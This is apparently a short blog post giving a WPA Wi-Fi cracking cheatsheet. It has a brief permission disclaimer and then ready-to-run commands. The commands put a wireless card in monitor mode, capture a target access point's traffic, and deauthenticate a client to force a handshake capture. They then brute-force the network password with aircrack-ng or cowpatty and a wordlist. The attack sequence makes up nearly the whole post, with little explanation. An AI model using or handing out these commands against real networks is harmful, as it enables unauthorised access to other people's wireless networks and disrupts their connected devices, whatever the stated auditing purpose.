There are too many guides and resources out there to doing this stuff so i wont be giving much explanation and theory on WPA hacking. Remember, this should only be performed on networks that you have permission to audit the security of. This here will serve as a quick and dirty cheatsheet of commands necessary to potentially audit the strength/weakness of your wireless networks using the aircrack-ng or cowpatty to bruteforce the password using a wordlist.
# airmon-ng start wlan0 // put interface in monitor mode
# airodump-ng mon0 // scan air for targets
# airodump-ng --channel 1 --bssid "AP_MAC_addr" -w wpa.cap mon0 //filter capture packets from a specific AP's MAC address and channel
#aireplay-ng --deauth 5 -a "AP_MAC_addr" -c "Client_MAC_addr" mon0 //Perform a deauthentication attack on a client to force reassociation in hope of capturing WPA handshake
When Handshake is captured
using cowpatty:
# cowpatty -f passwords.lst -r wpa.cap -s "essid_of_network" //attempt to bruteforce the password using wordlist
using aircrack-ng:
# aircrack-ng -w passwords.lst -e "essid_of_network" wpa.cap //attempt to bruteforce the password using wordlist
No comments:
Post a Comment